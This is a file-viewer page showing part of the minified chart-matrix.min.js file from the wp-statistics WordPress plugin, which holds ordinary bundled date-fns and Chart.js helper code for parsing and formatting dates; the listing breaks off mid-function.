File "chart-matrix.min.js"

Full path: /var/www/html/cemeau/wp-content/plugins/wp-statistics/assets/js/chartjs/chart-matrix.min.js
File size: 57.39 KB
MIME-type: text/plain
Charset: utf-8

Download   Open   Edit   Advanced Editor   Back

"use strict";function _classCallCheck(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function _defineProperties(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,_toPropertyKey(r.key),r)}}function _createClass(t,e,n){return e&&_defineProperties(t.prototype,e),n&&_defineProperties(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t}function _callSuper(t,e,n){return e=_getPrototypeOf(e),_possibleConstructorReturn(t,_isNativeReflectConstruct()?Reflect.construct(e,n||[],_getPrototypeOf(t).constructor):e.apply(t,n))}function _possibleConstructorReturn(t,e){if(e&&("object"==_typeof(e)||"function"==typeof e))return e;if(void 0!==e)throw new TypeError("Derived constructors may only return object or undefined");return _assertThisInitialized(t)}function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}function _isNativeReflectConstruct(){try{var t=!Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){}))}catch(t){}return(_isNativeReflectConstruct=function(){return!!t})()}function _get(){return(_get="undefined"!=typeof Reflect&&Reflect.get?Reflect.get.bind():function(t,e,n){var r=_superPropBase(t,e);if(r)return(r=Object.getOwnPropertyDescriptor(r,e)).get?r.get.call(arguments.length<3?t:n):r.value}).apply(null,arguments)}function _superPropBase(t,e){for(;!{}.hasOwnProperty.call(t,e)&&null!==(t=_getPrototypeOf(t)););return t}function _getPrototypeOf(t){return(_getPrototypeOf=Object.setPrototypeOf?Object.getPrototypeOf.bind():function(t){return t.__proto__||Object.getPrototypeOf(t)})(t)}function _inherits(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function");t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,writable:!0,configurable:!0}}),Object.defineProperty(t,"prototype",{writable:!1}),e&&_setPrototypeOf(t,e)}function _setPrototypeOf(t,e){return(_setPrototypeOf=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(t,e){return t.__proto__=e,t})(t,e)}function _defineProperty(t,e,n){return(e=_toPropertyKey(e))in t?Object.defineProperty(t,e,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[e]=n,t}function _toPropertyKey(t){t=_toPrimitive(t,"string");return"symbol"==_typeof(t)?t:t+""}function _toPrimitive(t,e){if("object"!=_typeof(t)||!t)return t;var n=t[Symbol.toPrimitive];if(void 0===n)return("string"===e?String:Number)(t);n=n.call(t,e||"default");if("object"!=_typeof(n))return n;throw new TypeError("@@toPrimitive must return a primitive value.")}function _typeof(t){return(_typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}!function(t){"object"==("undefined"==typeof exports?"undefined":_typeof(exports))&&"undefined"!=typeof module?t(require("chart.js")):"function"==typeof define&&define.amd?define(["chart.js"],t):t(("undefined"!=typeof globalThis?globalThis:self).Chart)}(function(H){function U(t){return null===t||!0===t||!1===t?NaN:(t=Number(t),isNaN(t)?t:t<0?Math.ceil(t):Math.floor(t))}function S(t,e){if(e.length<t)throw new TypeError(t+" argument"+(1<t?"s":"")+" required, but only "+e.length+" present")}function Y(t){S(1,arguments);var e=Object.prototype.toString.call(t);return t instanceof Date||"object"==_typeof(t)&&"[object Date]"===e?new Date(t.getTime()):"number"==typeof t||"[object Number]"===e?new Date(t):("string"!=typeof t&&"[object String]"!==e||"undefined"==typeof console||(console.warn("Starting with v2.0.0-beta.1 date-fns doesn't accept strings as date arguments. Please use `parseISO` to parse strings. See: https://git.io/fjule"),console.warn((new Error).stack)),new Date(NaN))}function r(t,e){S(2,arguments);t=Y(t),e=U(e);return isNaN(e)?new Date(NaN):(e&&t.setDate(t.getDate()+e),t)}function a(t,e){S(2,arguments);var n,r,t=Y(t),e=U(e);return isNaN(e)?new Date(NaN):e?(n=t.getDate(),(r=new Date(t.getTime())).setMonth(t.getMonth()+e+1,0),r.getDate()<=n?r:(t.setFullYear(r.getFullYear(),r.getMonth(),n),t)):t}function i(t,e){S(2,arguments);t=Y(t).getTime(),e=U(e);return new Date(t+e)}function o(t,e){S(1,arguments);var e=e||{},n=e.locale,n=n&&n.options&&n.options.weekStartsOn,n=null==n?0:U(n),n=null==e.weekStartsOn?n:U(e.weekStartsOn);if(0<=n&&n<=6)return t=((t=(e=Y(t)).getDay())<n?7:0)+t-n,e.setDate(e.getDate()-t),e.setHours(0,0,0,0),e;throw new RangeError("weekStartsOn must be between 0 and 6 inclusively")}function N(t){var e=new Date(Date.UTC(t.getFullYear(),t.getMonth(),t.getDate(),t.getHours(),t.getMinutes(),t.getSeconds(),t.getMilliseconds()));return e.setUTCFullYear(t.getFullYear()),t.getTime()-e.getTime()}function u(t){S(1,arguments);t=Y(t);return t.setHours(0,0,0,0),t}var R=864e5;function s(t,e){S(2,arguments);t=Y(t),e=Y(e),t=t.getTime()-e.getTime();return t<0?-1:0<t?1:t}function d(t){S(1,arguments);t=Y(t);return!isNaN(t)}function c(t,e){t=t.getFullYear()-e.getFullYear()||t.getMonth()-e.getMonth()||t.getDate()-e.getDate()||t.getHours()-e.getHours()||t.getMinutes()-e.getMinutes()||t.getSeconds()-e.getSeconds()||t.getMilliseconds()-e.getMilliseconds();return t<0?-1:0<t?1:t}function l(t,e){S(2,arguments);var t=Y(t),e=Y(e),n=c(t,e),r=Math.abs(function(t,e){return S(2,arguments),t=u(t),e=u(e),t=t.getTime()-N(t),e=e.getTime()-N(e),Math.round((t-e)/R)}(t,e));t.setDate(t.getDate()-n*r);r=n*(r-(c(t,e)===-n));return 0==r?0:r}function f(t,e){S(2,arguments);t=Y(t),e=Y(e);return t.getTime()-e.getTime()}function h(t){S(1,arguments);t=Y(t);return t.setHours(23,59,59,999),t}function m(t){S(1,arguments);var t=Y(t),e=t.getMonth();return t.setFullYear(t.getFullYear(),e+1,0),t.setHours(23,59,59,999),t}function g(t,e){S(2,arguments);var n=Y(t),e=Y(e),r=s(n,e),a=Math.abs(function(t,e){return S(2,arguments),t=Y(t),e=Y(e),12*(t.getFullYear()-e.getFullYear())+(t.getMonth()-e.getMonth())}(n,e));return 0===(r=a<1?0:(1===n.getMonth()&&27<n.getDate()&&n.setDate(30),n.setMonth(n.getMonth()-r*a),n=s(n,e)===-r,r*(a-(n=!function(t){return S(1,arguments),h(t=Y(t)).getTime()===m(t).getTime()}(Y(t))||1!==a||1!==s(t,e)?n:!1))))?0:r}var w={lessThanXSeconds:{one:"less than a second",other:"less than {{count}} seconds"},xSeconds:{one:"1 second",other:"{{count}} seconds"},halfAMinute:"half a minute",lessThanXMinutes:{one:"less than a minute",other:"less than {{count}} minutes"},xMinutes:{one:"1 minute",other:"{{count}} minutes"},aboutXHours:{one:"about 1 hour",other:"about {{count}} hours"},xHours:{one:"1 hour",other:"{{count}} hours"},xDays:{one:"1 day",other:"{{count}} days"},aboutXWeeks:{one:"about 1 week",other:"about {{count}} weeks"},xWeeks:{one:"1 week",other:"{{count}} weeks"},aboutXMonths:{one:"about 1 month",other:"about {{count}} months"},xMonths:{one:"1 month",other:"{{count}} months"},aboutXYears:{one:"about 1 year",other:"about {{count}} years"},xYears:{one:"1 year",other:"{{count}} years"},overXYears:{one:"over 1 year",other:"over {{count}} years"},almostXYears:{one:"almost 1 year",other:"almost {{count}} years"}};function t(e){return function(t){t=t||{},t=t.width?String(t.width):e.defaultWidth;return e.formats[t]||e.formats[e.defaultWidth]}}var F={date:t({formats:{full:"EEEE, MMMM do, y",long:"MMMM do, y",medium:"MMM d, y",short:"MM/dd/yyyy"},defaultWidth:"full"}),time:t({formats:{full:"h:mm:ss a zzzz",long:"h:mm:ss a z",medium:"h:mm:ss a",short:"h:mm a"},defaultWidth:"full"}),dateTime:t({formats:{full:"{{date}} 'at' {{time}}",long:"{{date}} 'at' {{time}}",medium:"{{date}}, {{time}}",short:"{{date}}, {{time}}"},defaultWidth:"full"})},W={lastWeek:"'last' eeee 'at' p",yesterday:"'yesterday at' p",today:"'today at' p",tomorrow:"'tomorrow at' p",nextWeek:"eeee 'at' p",other:"P"};function e(a){return function(t,e){var n,r,e=e||{};return("formatting"===(e.context?String(e.context):"standalone")&&a.formattingValues?(r=a.defaultFormattingWidth||a.defaultWidth,n=e.width?String(e.width):r,a.formattingValues[n]||a.formattingValues[r]):(n=a.defaultWidth,r=e.width?String(e.width):a.defaultWidth,a.values[r]||a.values[n]))[a.argumentCallback?a.argumentCallback(t):t]}}function n(i){return function(t,e){var r,t=String(t),e=e||{},n=e.width,a=n&&i.matchPatterns[n]||i.matchPatterns[i.defaultMatchWidth],a=t.match(a);return a?(r=a[0],a=n&&i.parsePatterns[n]||i.parsePatterns[i.defaultParseWidth],n=("[object Array]"===Object.prototype.toString.call(a)?function(t){for(var e=0;e<t.length;e++)if(t[e].test(r))return e}:function(t){for(var e in t)if(t.hasOwnProperty(e)&&(n=t[e],n.test(r)))return e;var n})(a),n=i.valueCallback?i.valueCallback(n):n,{value:n=e.valueCallback?e.valueCallback(n):n,rest:t.slice(r.length)}):null}}var y,j={code:"en-US",formatDistance:function(t,e,n){return n=n||{},t="string"==typeof w[t]?w[t]:1===e?w[t].one:w[t].other.replace("{{count}}",e),n.addSuffix?0<n.comparison?"in "+t:t+" ago":t},formatLong:F,formatRelative:function(t,e,n,r){return W[t]},localize:{ordinalNumber:function(t,e){var n=Number(t),t=n%100;if(20<t||t<10)switch(t%10){case 1:return n+"st";case 2:return n+"nd";case 3:return n+"rd"}return n+"th"},era:e({values:{narrow:["B","A"],abbreviated:["BC","AD"],wide:["Before Christ","Anno Domini"]},defaultWidth:"wide"}),quarter:e({values:{narrow:["1","2","3","4"],abbreviated:["Q1","Q2","Q3","Q4"],wide:["1st quarter","2nd quarter","3rd quarter","4th quarter"]},defaultWidth:"wide",argumentCallback:function(t){return Number(t)-1}}),month:e({values:{narrow:["J","F","M","A","M","J","J","A","S","O","N","D"],abbreviated:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],wide:["January","February","March","April","May","June","July","August","September","October","November","December"]},defaultWidth:"wide"}),day:e({values:{narrow:["S","M","T","W","T","F","S"],short:["Su","Mo","Tu","We","Th","Fr","Sa"],abbreviated:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],wide:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"]},defaultWidth:"wide"}),dayPeriod:e({values:{narrow:{am:"a",pm:"p",midnight:"mi",noon:"n",morning:"morning",afternoon:"afternoon",evening:"evening",night:"night"},abbreviated:{am:"AM",pm:"PM",midnight:"midnight",noon:"noon",morning:"morning",afternoon:"afternoon",evening:"evening",night:"night"},wide:{am:"a.m.",pm:"p.m.",midnight:"midnight",noon:"noon",morning:"morning",afternoon:"afternoon",evening:"evening",night:"night"}},defaultWidth:"wide",formattingValues:{narrow:{am:"a",pm:"p",midnight:"mi",noon:"n",morning:"in the morning",afternoon:"in the afternoon",evening:"in the evening",night:"at night"},abbreviated:{am:"AM",pm:"PM",midnight:"midnight",noon:"noon",morning:"in the morning",afternoon:"in the afternoon",evening:"in the evening",night:"at night"},wide:{am:"a.m.",pm:"p.m.",midnight:"midnight",noon:"noon",morning:"in the morning",afternoon:"in the afternoon",evening:"in the evening",night:"at night"}},defaultFormattingWidth:"wide"})},match:{ordinalNumber:(y={matchPattern:/^(\d+)(th|st|nd|rd)?/i,parsePattern:/\d+/i,valueCallback:function(t){return parseInt(t,10)}},function(t,e){var n,t=String(t),e=e||{},r=t.match(y.matchPattern);return r&&(r=r[0],n=t.match(y.parsePattern))?(n=y.valueCallback?y.valueCallback(n[0]):n[0],{value:n=e.valueCallback?e.valueCallback(n):n,rest:t.slice(r.length)}):null}),era:n({matchPatterns:{narrow:/^(b|a)/i,abbreviated:/^(b\.?\s?c\.?|b\.?\s?c\.?\s?e\.?|a\.?\s?d\.?|c\.?\s?e\.?)/i,wide:/^(before christ|before common era|anno domini|common era)/i},defaultMatchWidth:"wide",parsePatterns:{any:[/^b/i,/^(a|c)/i]},defaultParseWidth:"any"}),quarter:n({matchPatterns:{narrow:/^[1234]/i,abbreviated:/^q[1234]/i,wide:/^[1234](th|st|nd|rd)? quarter/i},defaultMatchWidth:"wide",parsePatterns:{any:[/1/i,/2/i,/3/i,/4/i]},defaultParseWidth:"any",valueCallback:function(t){return t+1}}),month:n({matchPatterns:{narrow:/^[jfmasond]/i,abbreviated:/^(jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)/i,wide:/^(january|february|march|april|may|june|july|august|september|october|november|december)/i},defaultMatchWidth:"wide",parsePatterns:{narrow:[/^j/i,/^f/i,/^m/i,/^a/i,/^m/i,/^j/i,/^j/i,/^a/i,/^s/i,/^o/i,/^n/i,/^d/i],any:[/^ja/i,/^f/i,/^mar/i,/^ap/i,/^may/i,/^jun/i,/^jul/i,/^au/i,/^s/i,/^o/i,/^n/i,/^d/i]},defaultParseWidth:"any"}),day:n({matchPatterns:{narrow:/^[smtwf]/i,short:/^(su|mo|tu|we|th|fr|sa)/i,abbreviated:/^(sun|mon|tue|wed|thu|fri|sat)/i,wide:/^(sunday|monday|tuesday|wednesday|thursday|friday|saturday)/i},defaultMatchWidth:"wide",parsePatterns:{narrow:[/^s/i,/^m/i,/^t/i,/^w/i,/^t/i,/^f/i,/^s/i],any:[/^su/i,/^m/i,/^tu/i,/^w/i,/^th/i,/^f/i,/^sa/i]},defaultParseWidth:"any"}),dayPeriod:n({matchPatterns:{narrow:/^(a|p|mi|n|(in the|at) (morning|afternoon|evening|night))/i,any:/^([ap]\.?\s?m\.?|midnight|noon|(in the|at) (morning|afternoon|evening|night))/i},defaultMatchWidth:"any",parsePatterns:{any:{am:/^a/i,pm:/^p/i,midnight:/^mi/i,noon:/^no/i,morning:/morning/i,afternoon:/afternoon/i,evening:/evening/i,night:/night/i}},defaultParseWidth:"any"})},options:{weekStartsOn:0,firstWeekContainsDate:1}};function L(t,e){return S(2,arguments),i(t,-U(e))}function p(t,e){for(var n=t<0?"-":"",r=Math.abs(t).toString();r.length<e;)r="0"+r;return n+r}var Q=function(t,e){t=t.getUTCFullYear(),t=0<t?t:1-t;return p("yy"===e?t%100:t,e.length)},I=function(t,e){t=t.getUTCMonth();return"M"===e?String(t+1):p(t+1,2)},B=function(t,e){return p(t.getUTCDate(),e.length)},X=function(t,e){return p(t.getUTCHours()%12||12,e.length)},z=function(t,e){return p(t.getUTCHours(),e.length)},G=function(t,e){return p(t.getUTCMinutes(),e.length)},A=function(t,e){return p(t.getUTCSeconds(),e.length)},K=function(t,e){var n=e.length,t=t.getUTCMilliseconds();return p(Math.floor(t*Math.pow(10,n-3)),e.length)};function b(t){S(1,arguments);var t=Y(t),e=t.getUTCDay(),e=(e<1?7:0)+e-1;return t.setUTCDate(t.getUTCDate()-e),t.setUTCHours(0,0,0,0),t}function Z(t){S(1,arguments);var t=Y(t),e=t.getUTCFullYear(),n=new Date(0),n=(n.setUTCFullYear(e+1,0,4),n.setUTCHours(0,0,0,0),b(n)),r=new Date(0),r=(r.setUTCFullYear(e,0,4),r.setUTCHours(0,0,0,0),b(r));return t.getTime()>=n.getTime()?e+1:t.getTime()>=r.getTime()?e:e-1}function $(t){S(1,arguments);t=Y(t),t=b(t).getTime()-function(t){S(1,arguments);var t=Z(t),e=new Date(0);return e.setUTCFullYear(t,0,4),e.setUTCHours(0,0,0,0),b(e)}(t).getTime();return Math.round(t/6048e5)+1}function v(t,e){S(1,arguments);var e=e||{},n=e.locale,n=n&&n.options&&n.options.weekStartsOn,n=null==n?0:U(n),n=null==e.weekStartsOn?n:U(e.weekStartsOn);if(0<=n&&n<=6)return t=((t=(e=Y(t)).getUTCDay())<n?7:0)+t-n,e.setUTCDate(e.getUTCDate()-t),e.setUTCHours(0,0,0,0),e;throw new RangeError("weekStartsOn must be between 0 and 6 inclusively")}function T(t,e){S(1,arguments);var n,t=Y(t,e),r=t.getUTCFullYear(),a=e||{},i=a.locale,i=i&&i.options&&i.options.firstWeekContainsDate,i=null==i?1:U(i),i=null==a.firstWeekContainsDate?i:U(a.firstWeekContainsDate);if(1<=i&&i<=7)return(a=new Date(0)).setUTCFullYear(r+1,0,i),a.setUTCHours(0,0,0,0),a=v(a,e),(n=new Date(0)).setUTCFullYear(r,0,i),n.setUTCHours(0,0,0,0),i=v(n,e),t.getTime()>=a.getTime()?r+1:t.getTime()>=i.getTime()?r:r-1;throw new RangeError("firstWeekContainsDate must be between 1 and 7 inclusively")}function J(t,e){S(1,arguments);t=Y(t),t=v(t,e).getTime()-function(t,e){S(1,arguments);var n=null==(n=(n=(r=e||{}).locale)&&n.options&&n.options.firstWeekContainsDate)?1:U(n),n=null==r.firstWeekContainsDate?n:U(r.firstWeekContainsDate),r=T(t,e),t=new Date(0);return t.setUTCFullYear(r,0,n),t.setUTCHours(0,0,0,0),v(t,e)}(t,e).getTime();return Math.round(t/6048e5)+1}function V(t,e){var n=0<t?"-":"+",t=Math.abs(t),r=Math.floor(t/60),t=t%60;return 0==t?n+String(r):(e=e||"",n+String(r)+e+p(t,2))}function tt(t,e){return t%60==0?(0<t?"-":"+")+p(Math.abs(t)/60,2):C(t,e)}function C(t,e){var e=e||"",n=0<t?"-":"+",t=Math.abs(t);return n+p(Math.floor(t/60),2)+e+p(t%60,2)}var et={G:function(t,e,n){var r=0<t.getUTCFullYear()?1:0;switch(e){case"G":case"GG":case"GGG":return n.era(r,{width:"abbreviated"});case"GGGGG":return n.era(r,{width:"narrow"});default:return n.era(r,{width:"wide"})}},y:function(t,e,n){var r;return"yo"===e?(r=t.getUTCFullYear(),n.ordinalNumber(0<r?r:1-r,{unit:"year"})):Q(t,e)},Y:function(t,e,n,r){t=T(t,r),r=0<t?t:1-t;return"YY"===e?p(r%100,2):"Yo"===e?n.ordinalNumber(r,{unit:"year"}):p(r,e.length)},R:function(t,e){return p(Z(t),e.length)},u:function(t,e){return p(t.getUTCFullYear(),e.length)},Q:function(t,e,n){var r=Math.ceil((t.getUTCMonth()+1)/3);switch(e){case"Q":return String(r);case"QQ":return p(r,2);case"Qo":return n.ordinalNumber(r,{unit:"quarter"});case"QQQ":return n.quarter(r,{width:"abbreviated",context:"formatting"});case"QQQQQ":return n.quarter(r,{width:"narrow",context:"formatting"});default:return n.quarter(r,{width:"wide",context:"formatting"})}},q:function(t,e,n){var r=Math.ceil((t.getUTCMonth()+1)/3);switch(e){case"q":return String(r);case"qq":return p(r,2);case"qo":return n.ordinalNumber(r,{unit:"quarter"});case"qqq":return n.quarter(r,{width:"abbreviated",context:"standalone"});case"qqqqq":return n.quarter(r,{width:"narrow",context:"standalone"});default:return n.quarter(r,{width:"wide",context:"standalone"})}},M:function(t,e,n){var r=t.getUTCMonth();switch(e){case"M":case"MM":return I(t,e);case"Mo":return n.ordinalNumber(r+1,{unit:"month"});case"MMM":return n.month(r,{width:"abbreviated",context:"formatting"});case"MMMMM":return n.month(r,{width:"narrow",context:"formatting"});default:return n.month(r,{width:"wide",context:"formatting"})}},L:function(t,e,n){var r=t.getUTCMonth();switch(e){case"L":return String(r+1);case"LL":return p(r+1,2);case"Lo":return n.ordinalNumber(r+1,{unit:"month"});case"LLL":return n.month(r,{width:"abbreviated",context:"standalone"});case"LLLLL":return n.month(r,{width:"narrow",context:"standalone"});default:return n.month(r,{width:"wide",context:"standalone"})}},w:function(t,e,n,r){t=J(t,r);return"wo"===e?n.ordinalNumber(t,{unit:"week"}):p(t,e.length)},I:function(t,e,n){t=$(t);return"Io"===e?n.ordinalNumber(t,{unit:"week"}):p(t,e.length)},d:function(t,e,n){return"do"===e?n.ordinalNumber(t.getUTCDate(),{unit:"date"}):B(t,e)},D:function(t,e,n){t=function(t){S(1,arguments);var t=Y(t),e=t.getTime(),t=(t.setUTCMonth(0,1),t.setUTCHours(0,0,0,0),t.getTime());return Math.floor((e-t)/864e5)+1}(t);return"Do"===e?n.ordinalNumber(t,{unit:"dayOfYear"}):p(t,e.length)},E:function(t,e,n){var r=t.getUTCDay();switch(e){case"E":case"EE":case"EEE":return n.day(r,{width:"abbreviated",context:"formatting"});case"EEEEE":return n.day(r,{width:"narrow",context:"formatting"});case"EEEEEE":return n.day(r,{width:"short",context:"formatting"});default:return n.day(r,{width:"wide",context:"formatting"})}},e:function(t,e,n,r){var a=t.getUTCDay(),i=(a-r.weekStartsOn+8)%7||7;switch(e){case"e":return String(i);case"ee":return p(i,2);case"eo":return n.ordinalNumber(i,{unit:"day"});case"eee":return n.day(a,{width:"abbreviated",context:"formatting"});case"eeeee":return n.day(a,{width:"narrow",context:"formatting"});case"eeeeee":return n.day(a,{width:"short",context:"formatting"});default:return n.day(a,{width:"wide",context:"formatting"})}},c:function(t,e,n,r){var a=t.getUTCDay(),i=(a-r.weekStartsOn+8)%7||7;switch(e){case"c":return String(i);case"cc":return p(i,e.length);case"co":return n.ordinalNumber(i,{unit:"day"});case"ccc":return n.day(a,{width:"abbreviated",context:"standalone"});case"ccccc":return n.day(a,{width:"narrow",context:"standalone"});case"cccccc":return n.day(a,{width:"short",context:"standalone"});default:return n.day(a,{width:"wide",context:"standalone"})}},i:function(t,e,n){var r=t.getUTCDay(),a=0===r?7:r;switch(e){case"i":return String(a);case"ii":return p(a,e.length);case"io":return n.ordinalNumber(a,{unit:"day"});case"iii":return n.day(r,{width:"abbreviated",context:"formatting"});case"iiiii":return n.day(r,{width:"narrow",context:"formatting"});case"iiiiii":return n.day(r,{width:"short",context:"formatting"});default:return n.day(r,{width:"wide",context:"formatting"})}},a:function(t,e,n){var r=1<=t.getUTCHours()/12?"pm":"am";switch(e){case"a":case"aa":return n.dayPeriod(r,{width:"abbreviated",context:"formatting"});case"aaa":return n.dayPeriod(r,{width:"abbreviated",context:"formatting"}).toLowerCase();case"aaaaa":return n.dayPeriod(r,{width:"narrow",context:"formatting"});default:return n.dayPeriod(r,{width:"wide",context:"formatting"})}},b:function(t,e,n){var t=t.getUTCHours(),r=12===t?"noon":0===t?"midnight":1<=t/12?"pm":"am";switch(e){case"b":case"bb":return n.dayPeriod(r,{width:"abbreviated",context:"formatting"});case"bbb":return n.dayPeriod(r,{width:"abbreviated",context:"formatting"}).toLowerCase();case"bbbbb":return n.dayPeriod(r,{width:"narrow",context:"formatting"});default:return n.dayPeriod(r,{width:"wide",context:"formatting"})}},B:function(t,e,n){var t=t.getUTCHours(),r=17<=t?"evening":12<=t?"afternoon":4<=t?"morning":"night";switch(e){case"B":case"BB":case"BBB":return n.dayPeriod(r,{width:"abbreviated",context:"formatting"});case"BBBBB":return n.dayPeriod(r,{width:"narrow",context:"formatting"});default:return n.dayPeriod(r,{width:"wide",context:"formatting"})}},h:function(t,e,n){var r;return"ho"===e?(r=t.getUTCHours()%12,n.ordinalNumber(r=0===r?12:r,{unit:"hour"})):X(t,e)},H:function(t,e,n){return"Ho"===e?n.ordinalNumber(t.getUTCHours(),{unit:"hour"}):z(t,e)},K:function(t,e,n){t=t.getUTCHours()%12;return"Ko"===e?n.ordinalNumber(t,{unit:"hour"}):p(t,e.length)},k:function(t,e,n){t=t.getUTCHours();return 0===t&&(t=24),"ko"===e?n.ordinalNumber(t,{unit:"hour"}):p(t,e.length)},m:function(t,e,n){return"mo"===e?n.ordinalNumber(t.getUTCMinutes(),{unit:"minute"}):G(t,e)},s:function(t,e,n){return"so"===e?n.ordinalNumber(t.getUTCSeconds(),{unit:"second"}):A(t,e)},S:function(t,e){return K(t,e)},X:function(t,e,n,r){var a=(r._originalDate||t).getTimezoneOffset();if(0===a)return"Z";switch(e){case"X":return tt(a);case"XXXX":case"XX":return C(a);default:return C(a,":")}},x:function(t,e,n,r){var a=(r._originalDate||t).getTimezoneOffset();switch(e){case"x":return tt(a);case"xxxx":case"xx":return C(a);default:return C(a,":")}},O:function(t,e,n,r){var a=(r._originalDate||t).getTimezoneOffset();switch(e){case"O":case"OO":case"OOO":return"GMT"+V(a,":");default:return"GMT"+C(a,":")}},z:function(t,e,n,r){var a=(r._originalDate||t).getTimezoneOffset();switch(e){case"z":case"zz":case"zzz":return"GMT"+V(a,":");default:return"GMT"+C(a,":")}},t:function(t,e,n,r){r=r._originalDate||t;return p(Math.floor(r.getTime()/1e3),e.length)},T:function(t,e,n,r){return p((r._originalDate||t).getTime(),e.length)}};function nt(t,e){switch(t){case"P":return e.date({width:"short"});case"PP":return e.date({width:"medium"});case"PPP":return e.date({width:"long"});default:return e.date({width:"full"})}}function rt(t,e){switch(t){case"p":return e.time({width:"short"});case"pp":return e.time({width:"medium"});case"ppp":return e.time({width:"long"});default:return e.time({width:"full"})}}var at={p:rt,P:function(t,e){var n,r=t.match(/(P+)(p+)?/),a=r[1],r=r[2];if(!r)return nt(t,e);switch(a){case"P":n=e.dateTime({width:"short"});break;case"PP":n=e.dateTime({width:"medium"});break;case"PPP":n=e.dateTime({width:"long"});break;default:n=e.dateTime({width:"full"})}return n.replace("{{date}}",nt(a,e)).replace("{{time}}",rt(r,e))}},it=["D","DD"],ot=["YY","YYYY"];function ut(t){return-1!==it.indexOf(t)}function st(t){return-1!==ot.indexOf(t)}function O(t,e,n){if("YYYY"===t)throw new RangeError("Use `yyyy` instead of `YYYY` (in `".concat(e,"`) for formatting years to the input `").concat(n,"`; see: https://git.io/fxCyr"));if("YY"===t)throw new RangeError("Use `yy` instead of `YY` (in `".concat(e,"`) for formatting years to the input `").concat(n,"`; see: https://git.io/fxCyr"));if("D"===t)throw new RangeError("Use `d` instead of `D` (in `".concat(e,"`) for formatting days of the month to the input `").concat(n,"`; see: https://git.io/fxCyr"));if("DD"===t)throw new RangeError("Use `dd` instead of `DD` (in `".concat(e,"`) for formatting days of the month to the input `").concat(n,"`; see: https://git.io/fxCyr"))}var ct=/[yYQqMLwIdDecihHKkms]o|(\w)\1*|''|'(''|[^'])+('|$)|./g,dt=/P+p+|P+|p+|''|'(''|[^'])+('|$)|./g,lt=/^'([^]*?)'?$/,ft=/''/g,ht=/[a-zA-Z]/;function x(t,e,n){S(2,arguments);var n=n||{},r=n.locale,r=r&&r.options&&r.options.weekStartsOn,r=null==r?0:U(r),r=null==n.weekStartsOn?r:U(n.weekStartsOn);if(0<=r&&r<=6)return n=Y(t),e=((7+(t=U(e))%7)%7<r?7:0)+t-n.getUTCDay(),n.setUTCDate(n.getUTCDate()+e),n;throw new RangeError("weekStartsOn must be between 0 and 6 inclusively")}var mt=/^(1[0-2]|0?\d)/,gt=/^(3[0-1]|[0-2]?\d)/,wt=/^(36[0-6]|3[0-5]\d|[0-2]?\d?\d)/,yt=/^(5[0-3]|[0-4]?\d)/,pt=/^(2[0-3]|[0-1]?\d)/,bt=/^(2[0-4]|[0-1]?\d)/,vt=/^(1[0-1]|0?\d)/,Tt=/^(1[0-2]|0?\d)/,Ct=/^[0-5]?\d/,xt=/^[0-5]?\d/,Mt=/^\d/,kt=/^\d{1,2}/,Dt=/^\d{1,3}/,Pt=/^\d{1,4}/,Ut=/^-?\d+/,St=/^-?\d/,Yt=/^-?\d{1,2}/,Nt=/^-?\d{1,3}/,Ot=/^-?\d{1,4}/,Et=/^([+-])(\d{2})(\d{2})?|Z/,qt=/^([+-])(\d{2})(\d{2})|Z/,_t=/^([+-])(\d{2})(\d{2})((\d{2}))?|Z/,Ht=/^([+-])(\d{2}):(\d{2})|Z/,Rt=/^([+-])(\d{2}):(\d{2})(:(\d{2}))?|Z/;function M(t,e,n){var r,t=e.match(t);return t?(r=parseInt(t[0],10),{value:n?n(r):r,rest:e.slice(t[0].length)}):null}function k(t,e){t=e.match(t);return t?"Z"===t[0]?{value:0,rest:e.slice(1)}:{value:("+"===t[1]?1:-1)*(36e5*(t[2]?parseInt(t[2],10):0)+6e4*(t[3]?parseInt(t[3],10):0)+1e3*(t[5]?parseInt(t[5],10):0)),rest:e.slice(t[0].length)}:null}function Ft(t,e){return M(Ut,t,e)}function D(t,e,n){switch(t){case 1:return M(Mt,e,n);case 2:return M(kt,e,n);case 3:return M(Dt,e,n);case 4:return M(Pt,e,n);default:return M(new RegExp("^\\d{1,"+t+"}"),e,n)}}function Wt(t,e,n){switch(t){case 1:return M(St,e,n);case 2:return M(Yt,e,n);case 3:return M(Nt,e,n);case 4:return M(Ot,e,n);default:return M(new RegExp("^-?\\d{1,"+t+"}"),e,n)}}function P(t){switch(t){case"morning":return 4;case"evening":return 17;case"pm":case"noon":case"afternoon":return 12;default:return 0}}function jt(t,e){var n=0<e,e=n?e:1-e;return e=e<=50?t||100:(e=e+50,t+100*Math.floor(e/100)-(e%100<=t?100:0)),n?e:1-e}var Lt=[31,28,31,30,31,30,31,31,30,31,30,31],Qt=[31,29,31,30,31,30,31,31,30,31,30,31];function It(t){return t%400==0||t%4==0&&t%100!=0}var Bt={G:{priority:140,parse:function(t,e,n,r){switch(e){case"G":case"GG":case"GGG":return n.era(t,{width:"abbreviated"})||n.era(t,{width:"narrow"});case"GGGGG":return n.era(t,{width:"narrow"});default:return n.era(t,{width:"wide"})||n.era(t,{width:"abbreviated"})||n.era(t,{width:"narrow"})}},set:function(t,e,n,r){return e.era=n,t.setUTCFullYear(n,0,1),t.setUTCHours(0,0,0,0),t},incompatibleTokens:["R","u","t","T"]},y:{priority:130,parse:function(t,e,n,r){function a(t){return{year:t,isTwoDigitYear:"yy"===e}}switch(e){case"y":return D(4,t,a);case"yo":return n.ordinalNumber(t,{unit:"year",valueCallback:a});default:return 